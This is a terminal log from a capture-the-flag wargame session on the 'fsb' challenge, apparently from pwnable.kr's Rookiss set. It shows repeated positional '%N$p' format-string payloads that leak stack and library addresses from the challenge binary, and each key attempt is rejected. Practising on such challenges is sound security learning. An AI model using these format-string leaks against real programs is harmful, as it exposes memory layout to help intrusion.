Give me some format strings(1)
%0$p.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p.%7$p.%8$p.%9$p.%10$p.%11$p.%12$p.%13$p.%14$p.%15$p.%16$p.%17$p.
%0$p.0x804a100.0x64.(nil).(nil).(nil).(nil).(nil).(nil).0x8048870.(nil).(nil).0xffbae28c.0xffbafff1.0xffb9c010.0xffb9c014.(nil).(nil).Give me some format strings(2)
%18$p.%19$p.%20$p.%21$p.%22$p.%23$p.%24$p.%25$p.%26$p.%27$p.%28$p.%29$p.%30$p.%31$p.%32$p.%33$p.
0xffbae0a8.0x8048791.(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).p.Give me some format strings(3)
%34$p.%35$p.%36$p.%37$p.%38$p.%39$p.%40$p.%41$p.%42$p.%43$p.%44$p.%45$p.%46$p.%47$p.%48$p.%49$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).p.Give me some format strings(4)
%50$p.%51$p.%52$p.%53$p.%54$p.%55$p.%56$p.%57$p.%58$p.%59$p.%60$p.%61$p.%62$p.%63$p.%64$p.%65$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).p.Wait a sec...
key : 

Incorrect key 
pxx@pxx-Lenovo-Erazer-Z400:~/program/pwnable/Rookiss/7-fsb$ python fsb.py 
:
Give me some format strings(1)
%66$p.%67$p.%68$p.%69$p.%70$p.%71$p.%72$p.%73$p.%74$p.%75$p.%76$p.%77$p.%78$p.%79$p.%80$p.%81$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(2)
%82$p.%83$p.%84$p.%85$p.%86$p.%87$p.%88$p.%89$p.%90$p.%91$p.%92$p.%93$p.%94$p.%95$p.%96$p.%97$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(3)
%98$p.%99$p.%100$p.%101$p.%102$p.%103$p.%104$p.%105$p.%106$p.%107$p.%108$p.%109$p.%110$p.%111$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(4)
%112$p.%113$p.%114$p.%115$p.%116$p.%117$p.%118$p.%119$p.%120$p.%121$p.%122$p.%123$p.%124$p.%125$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Wait a sec...
key : 

Incorrect key 
pxx@pxx-Lenovo-Erazer-Z400:~/program/pwnable/Rookiss/7-fsb$ python fsb.py 
:
Give me some format strings(1)
%126$p.%127$p.%128$p.%129$p.%130$p.%131$p.%132$p.%133$p.%134$p.%135$p.%136$p.%137$p.%138$p.%139$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(2)
%140$p.%141$p.%142$p.%143$p.%144$p.%145$p.%146$p.%147$p.%148$p.%149$p.%150$p.%151$p.%152$p.%153$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(3)
%154$p.%155$p.%156$p.%157$p.%158$p.%159$p.%160$p.%161$p.%162$p.%163$p.%164$p.%165$p.%166$p.%167$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(4)
%168$p.%169$p.%170$p.%171$p.%172$p.%173$p.%174$p.%175$p.%176$p.%177$p.%178$p.%179$p.%180$p.%181$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Wait a sec...
key : 

Incorrect key 
pxx@pxx-Lenovo-Erazer-Z400:~/program/pwnable/Rookiss/7-fsb$ python fsb.py 
:
Give me some format strings(1)
%182$p.%183$p.%184$p.%185$p.%186$p.%187$p.%188$p.%189$p.%190$p.%191$p.%192$p.%193$p.%194$p.%195$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(2)
%196$p.%197$p.%198$p.%199$p.%200$p.%201$p.%202$p.%203$p.%204$p.%205$p.%206$p.%207$p.%208$p.%209$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(3)
%210$p.%211$p.%212$p.%213$p.%214$p.%215$p.%216$p.%217$p.%218$p.%219$p.%220$p.%221$p.%222$p.%223$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Give me some format strings(4)
%224$p.%225$p.%226$p.%227$p.%228$p.%229$p.%230$p.%231$p.%232$p.%233$p.%234$p.%235$p.%236$p.%237$p.
(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).(nil).Wait a sec...
key : 

Incorrect key 
pxx@pxx-Lenovo-Erazer-Z400:~/program/pwnable/Rookiss/7-fsb$ python fsb.py 
:
Give me some format strings(1)
%238$p.%239$p.%240$p.%241$p.%242$p.%243$p.%244$p.%245$p.%246$p.%247$p.%248$p.%249$p.%250$p.%251$p.
0x8049ff4.0x10.0x80487a0.0x8048480.(nil).0x3.0xffa4be90.0xf76f1000.(nil).0xf7560a83.0x80487a0.(nil).(nil).0xf7560a83.Give me some format strings(2)
%252$p.%253$p.%254$p.%255$p.%256$p.%257$p.%258$p.%259$p.%260$p.%261$p.%262$p.%263$p.%264$p.%265$p.
0x2.0xffa4bf24.0xffa4bf30.0xf772cc9a.0x2.0xffa4bf24.0xffa4bec4.0x804a018.0x804828c.0xf76f1000.(nil).(nil).(nil).0x26df064e.Give me some format strings(3)
%266$p.%267$p.%268$p.%269$p.%270$p.%271$p.%272$p.%273$p.%274$p.%275$p.%276$p.%277$p.%278$p.%279$p.
0xc3b6a25f.(nil).(nil).(nil).0x2.0x8048480.(nil).0xf77324b0.0xf7560999.0xf773f000.0x2.0x8048480.(nil).0x80484a1.Give me some format strings(4)
%280$p.%281$p.%282$p.%283$p.%284$p.%285$p.%286$p.%287$p.%288$p.%289$p.%290$p.%291$p.%292$p.%293$p.
0x80486df.0x2.0xffa4bf24.0x80487a0.0x8048810.0xf772d130.0xffa4bf1c.0x1c.0x2.0xffa4e0aa.0xffa4e0b0.(nil).0xffa4e0b5.0xffa4e0c0.Wait a sec...
